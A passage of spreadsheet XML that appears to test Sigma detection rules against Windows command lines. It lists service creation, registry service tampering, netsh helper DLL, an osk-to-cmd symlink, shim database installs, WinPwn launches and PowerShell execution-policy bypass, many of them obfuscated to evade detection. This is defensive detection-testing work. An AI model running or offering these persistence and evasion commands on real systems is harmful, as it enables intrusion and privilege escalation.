        <v>0</v>
      </c>
    </row>
    <row r="214" ht="15.75" customHeight="1" s="42">
      <c r="A214" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B214" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C214" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D214" s="44" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E214" s="43" t="inlineStr">
        <is>
          <t>sc.exe create AtomicService binPath^= "C:\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F214" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G214" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H214" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I214" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J214" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K214" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="215" ht="15.75" customHeight="1" s="42">
      <c r="A215" s="43" t="n"/>
      <c r="B215" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_creation</t>
        </is>
      </c>
      <c r="C215" s="43" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation</t>
        </is>
      </c>
      <c r="D215" s="43" t="inlineStr">
        <is>
          <t>17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8</t>
        </is>
      </c>
      <c r="E215" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\System\CurrentControlSet\Services\MaliciousService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Users\Public\malware.exe" /f</t>
        </is>
      </c>
      <c r="F215" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G215" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H215" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I215" s="43" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Existing Service Tampering (38879043-7e1e-47a9-8d46-6bec88e201df); Potential Persistence Attempt Via Existing Service Tampering (38879043-7e1e-47a9-8d46-6bec88e201df)</t>
        </is>
      </c>
      <c r="J215" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K215" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="216" ht="15.75" customHeight="1" s="42">
      <c r="A216" s="44" t="inlineStr">
        <is>
          <t>t1546.002</t>
        </is>
      </c>
      <c r="B216" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_screensaver</t>
        </is>
      </c>
      <c r="C216" s="44" t="inlineStr">
        <is>
          <t>Suspicious ScreenSave Change by Reg.exe</t>
        </is>
      </c>
      <c r="D216" s="44" t="inlineStr">
        <is>
          <t>0fc35fc3-efe6-4898-8a37-0b233339524f</t>
        </is>
      </c>
      <c r="E216" s="43" t="inlineStr">
        <is>
          <t>reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop"  /v  ScreenSaveActive  /t  REG_SZ  /d  1  /f</t>
        </is>
      </c>
      <c r="F216" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G216" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H216" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I216" s="43" t="n"/>
      <c r="J216" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K216" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="217" ht="15.75" customHeight="1" s="42">
      <c r="A217" s="43" t="inlineStr">
        <is>
          <t>t1546.002</t>
        </is>
      </c>
      <c r="B217" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_screensaver</t>
        </is>
      </c>
      <c r="C217" s="43" t="inlineStr">
        <is>
          <t>Suspicious ScreenSave Change by Reg.exe</t>
        </is>
      </c>
      <c r="D217" s="43" t="inlineStr">
        <is>
          <t>0fc35fc3-efe6-4898-8a37-0b233339524f</t>
        </is>
      </c>
      <c r="E217" s="43" t="inlineStr">
        <is>
          <t>reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" "/v" ScreenSaveActive "/t" REG_SZ "/d" 1 "/f"</t>
        </is>
      </c>
      <c r="F217" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G217" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H217" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I217" s="43" t="n"/>
      <c r="J217" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K217" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="218" ht="15.75" customHeight="1" s="42">
      <c r="A218" s="44" t="inlineStr">
        <is>
          <t>t1546.002</t>
        </is>
      </c>
      <c r="B218" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_screensaver</t>
        </is>
      </c>
      <c r="C218" s="44" t="inlineStr">
        <is>
          <t>Suspicious ScreenSave Change by Reg.exe</t>
        </is>
      </c>
      <c r="D218" s="44" t="inlineStr">
        <is>
          <t>0fc35fc3-efe6-4898-8a37-0b233339524f</t>
        </is>
      </c>
      <c r="E218" s="43" t="inlineStr">
        <is>
          <t>reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" -v ScreenSaveActive -t REG_SZ -d 1 -f</t>
        </is>
      </c>
      <c r="F218" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G218" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H218" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I218" s="43" t="n"/>
      <c r="J218" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K218" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="219" ht="15.75" customHeight="1" s="42">
      <c r="A219" s="43" t="inlineStr">
        <is>
          <t>t1546.007</t>
        </is>
      </c>
      <c r="B219" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_helper_dll_persistence</t>
        </is>
      </c>
      <c r="C219" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL</t>
        </is>
      </c>
      <c r="D219" s="44" t="inlineStr">
        <is>
          <t>56321594-9087-49d9-bf10-524fe8479452</t>
        </is>
      </c>
      <c r="E219" s="44" t="inlineStr">
        <is>
          <t>netsh.exe "add" helper "C:\AtomicRedTeam\atomics\T1546.007_x0008_in\NetshHelper.dll"</t>
        </is>
      </c>
      <c r="F219" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G219" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H219" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I219" s="43" t="n"/>
      <c r="J219" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K219" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="220" ht="15.75" customHeight="1" s="42">
      <c r="A220" s="43" t="inlineStr">
        <is>
          <t>t1546.007</t>
        </is>
      </c>
      <c r="B220" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_helper_dll_persistence</t>
        </is>
      </c>
      <c r="C220" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL</t>
        </is>
      </c>
      <c r="D220" s="44" t="inlineStr">
        <is>
          <t>56321594-9087-49d9-bf10-524fe8479452</t>
        </is>
      </c>
      <c r="E220" s="44" t="inlineStr">
        <is>
          <t>netsh.exe add "hel""per" "C:\AtomicRedTeam\atomics\T1546.007_x0008_in\NetshHelper.dll"</t>
        </is>
      </c>
      <c r="F220" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G220" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H220" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I220" s="43" t="n"/>
      <c r="J220" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K220" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="221" ht="15.75" customHeight="1" s="42">
      <c r="A221" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B221" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_osk_cmd</t>
        </is>
      </c>
      <c r="C221" s="44" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation Using Symlink Between Osk and Cmd</t>
        </is>
      </c>
      <c r="D221" s="44" t="inlineStr">
        <is>
          <t>e9b61244-893f-427c-b287-3e708f321c6b</t>
        </is>
      </c>
      <c r="E221" s="44" t="inlineStr">
        <is>
          <t>cmd /c mklink C:\Windows\System32\osk.exe C:\Windows\System32\cmd</t>
        </is>
      </c>
      <c r="F221" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G221" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H221" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I221" s="44" t="n"/>
      <c r="J221" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K221" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="222" ht="15.75" customHeight="1" s="42">
      <c r="A222" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B222" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_osk_cmd</t>
        </is>
      </c>
      <c r="C222" s="44" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation Using Symlink Between Osk and Cmd</t>
        </is>
      </c>
      <c r="D222" s="44" t="inlineStr">
        <is>
          <t>e9b61244-893f-427c-b287-3e708f321c6b</t>
        </is>
      </c>
      <c r="E222" s="44" t="inlineStr">
        <is>
          <t>cmd /c mklink C:\Windows\System32\.\osk.exe C:\Windows\System32\..\System32\cmd.exe</t>
        </is>
      </c>
      <c r="F222" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G222" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H222" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I222" s="43" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation Using Symlink Between Osk and Cmd (e9b61244-893f-427c-b287-3e708f321c6b); Potential Privilege Escalation Using Symlink Between Osk and Cmd (e9b61244-893f-427c-b287-3e708f321c6b); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b)</t>
        </is>
      </c>
      <c r="J222" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K222" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="223" ht="15.75" customHeight="1" s="42">
      <c r="A223" s="44" t="inlineStr">
        <is>
          <t>t1546.011</t>
        </is>
      </c>
      <c r="B223" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sdbinst_shim_persistence</t>
        </is>
      </c>
      <c r="C223" s="44" t="inlineStr">
        <is>
          <t>Potential Shim Database Persistence via Sdbinst.EXE</t>
        </is>
      </c>
      <c r="D223" s="44" t="inlineStr">
        <is>
          <t>517490a7-115a-48c6-8862-1a481504d5a8</t>
        </is>
      </c>
      <c r="E223" s="44" t="inlineStr">
        <is>
          <t>sdbinst.exe "C:\AtomicRedTeam\atomics\T1546.011\bin\AtomicShimx86.sd""b"</t>
        </is>
      </c>
      <c r="F223" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G223" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H223" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I223" s="44" t="inlineStr">
        <is>
          <t>Uncommon Extension Shim Database Installation Via Sdbinst.EXE (18ee686c-38a3-4f65-9f44-48a077141f42)</t>
        </is>
      </c>
      <c r="J223" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K223" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="224" ht="15.75" customHeight="1" s="42">
      <c r="A224" s="44" t="inlineStr">
        <is>
          <t>t1546.011</t>
        </is>
      </c>
      <c r="B224" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sdbinst_shim_persistence</t>
        </is>
      </c>
      <c r="C224" s="44" t="inlineStr">
        <is>
          <t>Potential Shim Database Persistence via Sdbinst.EXE</t>
        </is>
      </c>
      <c r="D224" s="44" t="inlineStr">
        <is>
          <t>517490a7-115a-48c6-8862-1a481504d5a8</t>
        </is>
      </c>
      <c r="E224" s="44" t="inlineStr">
        <is>
          <t>sdbinst.exe "\\?\C:\AtomicRedTeam\atomics\T1546.011\bin\AtomicShimx86.sdb "</t>
        </is>
      </c>
      <c r="F224" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G224" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H224" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I224" s="44" t="inlineStr">
        <is>
          <t>Potential Shim Database Persistence via Sdbinst.EXE (517490a7-115a-48c6-8862-1a481504d5a8)</t>
        </is>
      </c>
      <c r="J224" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K224" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="225" ht="15.75" customHeight="1" s="42">
      <c r="A225" s="44" t="inlineStr">
        <is>
          <t>t1546.011</t>
        </is>
      </c>
      <c r="B225" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sdbinst_shim_persistence</t>
        </is>
      </c>
      <c r="C225" s="44" t="inlineStr">
        <is>
          <t>Potential Shim Database Persistence via Sdbinst.EXE</t>
        </is>
      </c>
      <c r="D225" s="44" t="inlineStr">
        <is>
          <t>517490a7-115a-48c6-8862-1a481504d5a8</t>
        </is>
      </c>
      <c r="E225" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c sdbinst.exe "C:\AtomicRedTeam\atomics\T1546.011\bin\AtomicShimx86.sd^b"</t>
        </is>
      </c>
      <c r="F225" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G225" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H225" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I225" s="44" t="inlineStr">
        <is>
          <t>Uncommon Extension Shim Database Installation Via Sdbinst.EXE (18ee686c-38a3-4f65-9f44-48a077141f42)</t>
        </is>
      </c>
      <c r="J225" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K225" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="226" ht="15.75" customHeight="1" s="42">
      <c r="A226" s="44" t="n"/>
      <c r="B226" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C226" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D226" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E226" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F226" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G226" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H226" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I226" s="43" t="n"/>
      <c r="J226" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K226" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="227" ht="15.75" customHeight="1" s="42">
      <c r="A227" s="43" t="n"/>
      <c r="B227" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C227" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D227" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E227" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F227" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G227" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H227" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I227" s="43" t="n"/>
      <c r="J227" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K227" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="228" ht="15.75" customHeight="1" s="42">
      <c r="A228" s="44" t="n"/>
      <c r="B228" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C228" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D228" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E228" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F228" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G228" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H228" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I228" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J228" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K228" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="229" ht="15.75" customHeight="1" s="42">
      <c r="A229" s="43" t="n"/>
      <c r="B229" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C229" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D229" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E229" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F229" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G229" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H229" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I229" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J229" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K229" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="230" ht="15.75" customHeight="1" s="42">
      <c r="A230" s="43" t="n"/>
      <c r="B230" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C230" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D230" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E230" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F230" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G230" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H230" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I230" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J230" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K230" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="231" ht="15.75" customHeight="1" s="42">
      <c r="A231" s="44" t="n"/>
      <c r="B231" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C231" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D231" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E231" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F231" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G231" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H231" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I231" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J231" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K231" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="232" ht="15.75" customHeight="1" s="42">
      <c r="A232" s="43" t="n"/>
      <c r="B232" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C232" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D232" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E232" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F232" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G232" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H232" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I232" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J232" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K232" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="233" ht="15.75" customHeight="1" s="42">
      <c r="A233" s="44" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B233" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C233" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D233" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E233" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F233" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G233" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H233" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I233" s="43" t="n"/>
      <c r="J233" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K233" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="234" ht="15.75" customHeight="1" s="42">
      <c r="A234" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B234" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C234" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D234" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E234" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F234" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G234" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H234" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I234" s="43" t="n"/>
      <c r="J234" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K234" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="235" ht="15.75" customHeight="1" s="42">
      <c r="A235" s="44" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B235" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C235" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D235" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E235" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F235" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G235" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H235" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I235" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J235" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K235" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="236" ht="15.75" customHeight="1" s="42">
      <c r="A236" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B236" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C236" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D236" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E236" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F236" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G236" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H236" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I236" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J236" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K236" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="237" ht="15.75" customHeight="1" s="42">
      <c r="A237" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B237" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C237" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D237" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E237" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F237" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G237" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H237" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I237" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J237" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K237" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="238" ht="15.75" customHeight="1" s="42">
      <c r="A238" s="44" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B238" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C238" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D238" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E238" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F238" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G238" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H238" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I238" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J238" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K238" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="239" ht="15.75" customHeight="1" s="42">
      <c r="A239" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B239" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C239" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D239" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E239" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F239" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G239" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H239" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I239" s="43" t="inlineStr">
        <is>
